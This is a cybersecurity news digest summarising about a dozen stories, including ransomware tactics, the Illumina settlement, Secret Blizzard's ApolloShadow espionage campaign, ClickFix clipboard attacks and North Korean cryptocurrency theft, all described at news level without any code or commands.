Daily Brief

Ransomware gangs are increasingly threatening physical violence against employees and their families to compel payment from victim organizations. A survey by Censuswide for Semperis found that 40% of 1,500 security and IT professionals reported physical threats from attackers. Traditional threats remain prevalent, with 52% facing system lockouts and 63% experiencing data destruction threats. Attackers also threaten regulatory repercussions, with nearly half of the respondents indicating a risk of complaints to authorities similar to the SEC complaint against MeridianLink. Semperis' report shows that 78% of organizations surveyed faced a ransomware attack in the past year; 56% of these attacks resulted in successful infections. A notable decline in recovery speed from ransomware attacks was observed, with only 23% recovering within a day, down from 39% the previous year. Approximately 15% of organizations that paid the ransom did not receive functional decryption keys, and an additional 3% reported leaked data despite payment. Semperis' director of breach preparedness and response, Jeff Wichman, emphasized the dangers of paying ransoms, noting that attackers often resell stolen data.

Illumina has settled with the U.S. government for $9.8 million over allegations of selling insecure genetic testing systems. The Department of Justice claimed Illumina failed to meet required cybersecurity standards while billing government agencies for compliant devices. The settlement addresses whistleblower claims that for over seven years, Illumina submitted false claims regarding the security compliance of their devices. Illumina controls over 80% of the global genetic testing market, highlighting significant impact potential from the alleged security lapses. Security concerns included hardcoded user credentials, improper account privileges, and unresolved insider threat mitigation. Despite the allegations, Illumina made no admission of wrongdoing, citing the settlement as a measure to avoid prolonged litigation and costs. The company asserts to have rectified the implicated software issues and emphasizes its commitment to stringent data security and customer relationship management. Illumina expresses relief at resolving these issues while emphasizing investments in cybersecurity best practices.

Kali Linux has been updated to run on macOS systems within Apple's new containerization framework on Apple Silicon. The feature was introduced at Apple's WWDC 2025, highlighting integration similar to Microsoft’s WSL2 for Linux distros. Users must install a specific CLI through Homebrew and use commands to launch and manage the Kali Linux container. This implementation supports mounting local directories to the Kali VM to enable file access from the host macOS. The new containerization on macOS Sequoia currently faces some limitations, such as lack of support for Intel Macs and networking issues within containers. Cybersecurity experts advise that certain Kali Linux use cases might be restricted due to the inability to perform hardware passthrough. Though there are identified bugs and limitations, this development simplifies the process of conducting security tests on macOS using Kali Linux.

Microsoft plans to disable external workbook links to blocked file types in Excel between October 2025 and July 2026 to enhance security. Workbooks with links to blocked file types will show a #BLOCKED error or fail to refresh following the update. This security measure is part of the new FileBlockExternalLinks group policy, expanding current File Block Settings. Microsoft 365 will inform users about these changes via a business bar warning in workbooks with external links to blocked file types starting from Build 2509. Admins can re-enable links to blocked file types by modifying the Excel security settings in the Windows registry. These changes include previously initiated actions such as the disabling of ActiveX controls and expansion of the Antimalware Scan Interface for better protection against malware. Microsoft has also recently increased bounty payouts to $40,000 for certain vulnerabilities, reflecting their continued focus on security enhancements across their platforms.

Microsoft has updated its Azure AI Speech service to include a new feature that allows users to create voice replicas with just seconds of sampled speech. The enhanced model, called "DragonV2.1Neural," offers more natural and expressive voice outputs and supports over 100 languages. The improved system provides better speech naturalness, realistic prosody, and enhanced pronunciation accuracy. This upgrade enables various applications such as customizing chatbot voices and dubbing video content across multiple languages. Despite potential for misuse, Microsoft includes safety measures like watermarking and usage policies requiring original speaker consent and prohibiting impersonation. Concerns have grown around AI voice cloning technology, especially given its application in scams and the lack of sufficient safeguards in some voice cloning services. Earlier warnings from Consumer Reports and the FBI highlight the risks associated with AI voice cloning technologies in fraud schemes.

Microsoft has updated its .NET bug bounty program to increase rewards, offering up to $40,000 for critical vulnerabilities. The program now includes higher payouts for issues in .NET and ASP.NET Core, reflecting the complexity and risk associated with these vulnerabilities. Critical remote code execution and privilege escalation flaws can fetch up to $40,000, with $30,000 available for critical security feature bypasses. The updated bounty program also covers critical remote denial-of-service (DoS) bugs, with rewards up to $20,000. Expansion includes more comprehensive coverage of .NET framework vulnerabilities. These changes are part of Microsoft's Secure Future Initiative (SFI), aimed at enhancing overall cybersecurity in response to criticisms from the Department of Homeland Security. Microsoft continues incentivizing research and security improvements across its platforms, including enhancements in AI security with increased bounties.

China's Cyberspace Administration suspects backdoor vulnerabilities in Nvidia's H20 AI chips and demands an explanation under stringent security laws. The issue emerged after the U.S. lifted a ban that previously blocked the export of these chips to China, originally imposed over fears of military use. Beijing's renewed scrutiny appears tied to the U.S. Chip Security Act mandating tracking technology in AI chips, raising espionage fears. Allegations include embedded technologies in Nvidia's chips for tracking, positioning, and remote shutdown capabilities. Despite U.S. restrictions, a significant volume of Nvidia's AI chips reportedly entered China's black market, circumventing official channels. Nvidia denies any intentional backdoors in its chips, emphasizing their commitment to stringent cybersecurity practices. This confrontation underscores ongoing tensions and technologies' geopolitical implications, especially in the AI and semiconductor sectors.

Secret Blizzard, a Russian nation-state actor, is targeting foreign embassies in Moscow via sophisticated AitM attacks at the ISP level. The group employs malware called ApolloShadow, designed to trick devices with fake certificates and gain persistent access. The campaign has been active since at least 2024, utilizing local ISPs to compromise diplomatic communications for intelligence gathering. Microsoft's report reveals tactics including lawful intercept misuse, installing rogue root certificates, and redirecting internet traffic through a captive portal. ApolloShadow's functionalities include modifying system settings to facilitate potential lateral movement within networks without direct attempts observed. Microsoft suggests embassies enforce least privilege access, review privileged accounts regularly, and secure traffic through encrypted tunnels or VPNs to mitigate threats. The group uses complex methods to obscure its activities, including leveraging infrastructure from unrelated third-party threat actors.

CISA announced the availability of Thorium, an open-source platform for malware and forensic analysis designed to automate tasks in cyberattack investigations. Developed in collaboration with Sandia National Laboratories, Thorium can schedule over 1,700 jobs per second and handles more than 10 million files per hour per permission group. Thorium integrates commercial, open-source, and custom tools to enhance cybersecurity teams' analytical capabilities in software analysis, digital forensics, and incident response. The platform enables cybersecurity analysts to efficiently assess complex malware threats and supports various mission functions. Installation instructions and access to Thorium are available on CISA's official GitHub repository, promoting the use of advanced tools across the cybersecurity community. Scalable analysis provided by Thorium aids in understanding and addressing vulnerabilities in benign software, enhancing overall security readiness. Thorium is part of CISA’s continued efforts to support the cybersecurity community, following the release of the Eviction Strategies Tool and the "Malware Next-Gen" analysis system in previous years.

Russian cyberspies, attributed to the Kremlin-backed group Secret Blizzard, are targeting foreign embassies in Moscow using local ISP networks. Microsoft Threat Intelligence has reported the espionage since at least 2024, pinpointing AiTM (adversary-in-the-middle) attacks facilitated likely by lawful intercepts. The attackers employ fake networks and captive portals to redirect embassy communications and deploy the ApolloShadow malware. ApolloShadow facilitates extensive privileges on compromised devices, enabling manipulation of network settings and data interception. Once infected, ApolloShadow can manipulate DNS settings to redirect communications to a control server, exposing sensitive diplomatic communications. Microsoft advises entities in Moscow to use encrypted communication channels or VPNs not reliant on local ISPs to mitigate risk. This case highlights the strategic use of geopolitical control over ISPs, turning local infrastructure into an extension of espionage capabilities.

Microsoft has identified a Russian hacker group, Secret Blizzard, targeting diplomatic missions in Moscow using local ISP access. The hackers employ Adversary-in-the-Middle (AiTM) attacks, redirecting targets to download the ApolloShadow malware via fake portals. ApolloShadow malware installs a deceptive trusted root certificate mimicking Kaspersky Anti-Virus, facilitating long-term espionage. The cyber-espionage tactics leverage Russia’s System for Operative Investigative Activities (SORM) for extensive AiTM campaigns. This cyber threat has been monitored actively by Microsoft since 2024, with Secret Blizzard's ISP-level espionage capabilities newly confirmed. Secret Blizzard, linked to the Russian FSB, has been involved in global cyber-espionage since 1996, targeting sensitive government and research entities. The group is known for sophisticated and unconventional cyber tactics, including the control of malware via social media and hijacking other nation's cyber infrastructures.

Cybersecurity researchers have uncovered a sophisticated phishing campaign that exploits Proofpoint’s link wrapping service to mask malicious URLs and evade detection. Attackers gain unauthorized access to email accounts within an organization and use this access to send emails with malicious URLs wrapped by Proofpoint, making them appear legitimate. The malicious emails feature multi-layer redirects, initially using a URL shortening service like Bitly, before being further obscured by Proofpoint’s URL Defense, creating a complex redirection chain to evade security measures. This technique is employed in various deceptive emails, such as fake voicemail notifications and Microsoft Teams messages, which trick users into clicking on links that lead to fake Microsoft 365 login pages designed to harvest credentials. The phishing campaign also utilizes Scalable Vector Graphics (SVG) files and fake Zoom meeting links in separate schemes to bypass traditional security protocols and trick users into divulging personal information. Cloudflare highlights the increasing sophistication of phishing attacks that cleverly use trusted tools and methodologies to increase their success rate in credential theft. Recent reports by Cofense and other cybersecurity entities indicate a rise in such multi-stage phishing attacks, signaling a shift towards more elaborate and covert methods of cybercrime.

Security researchers at SentinelLabs analyzed an unsealed US DOJ indictment, identifying 16 patents related to offensive cyber tools linked to China's Ministry of State Security (MSS). The patents, filed between 2014 and 2020 by Shanghai Powerock and Shanghai Huayun Firetech, were connected to the Silk Typhoon espionage team, known for their attack on Microsoft Exchange. The tools patented included utilities for decrypting hard drives, network sniffers, forensic software, and spyware capable of accessing files on Apple devices. The Chinese companies involved had previously operated under non-publicized alliances with MSS, supporting ongoing cyber espionage efforts. Yin Kecheng, associated with similar hacking operations through Shanghai Heiying Information Technology, was arrested earlier for his involvement in profitable computer intrusion campaigns since 2013. SentinelLabs stresses that while theoretically possible for defensive use, there is no evidence suggesting these tools were used as such, highlighting a clear intent geared towards espionage. Despite concrete links and ongoing litigation, Beijing continues to deny any involvement in cyber espionage operations.

ClickFix is a social engineering method used by attackers to manipulate users into executing malicious code hidden in their clipboard. Usually triggered by a user clicking on something appearing legitimate (like a CAPTCHA), the malicious code is then silently copied to their clipboard. Keep Aware, a browser security platform, is highlighted for its ability to detect and block these deceptive interactions through clipboard monitoring and real-time activity analysis. An instance of an attack was prevented when Keep Aware alerted a user of a suspicious command after a ClickFix attempt that originated from a search engine result. ClickFix attacks, if successful, can lead to the loading of various malware and remote access trojans, causing significant harm to the compromised device. FileFix represents the latest iteration of this type of attack, targeting user interactions with File Explorer by hiding malicious commands in deceivingly innocuous-looking inputs. These clipboard-based attacks emphasize a critical vulnerability within the browser, showcasing it as a key vector for device compromise largely overlooked by traditional security measures.

North Korea-linked UNC4899 engaged in sophisticated cryptocurrency theft targeting multiple organizations through social engineering via LinkedIn and Telegram. The attackers employed malicious Docker containers and npm packages to infiltrate systems, leveraging job offers and collaborative project lures on platforms like GitHub. UNC4899, also known as Jade Sleet, PUKCHONG, Slow Pisces, and TraderTraitor, has been active since 2020 and is associated with significant crypto heists. The group exploited cloud environments such as Google Cloud and AWS, using malware like GLASSCANNON, PLOTTWIST, and MAZEWIRE to establish remote connections and perform actions like credential theft. In one instance, malicious actors disabled and later reinstated MFA to maintain access without detection. The operations concluded with the threat actors successfully extracting millions in cryptocurrency by manipulating CloudFront and S3 configurations. Google's intervention highlighted the use of stolen credentials and session cookies in the attacks, which prevented further unauthorized activities due to multi-factor authentication (MFA) barriers. The activity forms part of a broader strategy by North Korea's Lazarus Group, which has escalated inserting malware into npm and PyPI open source registries.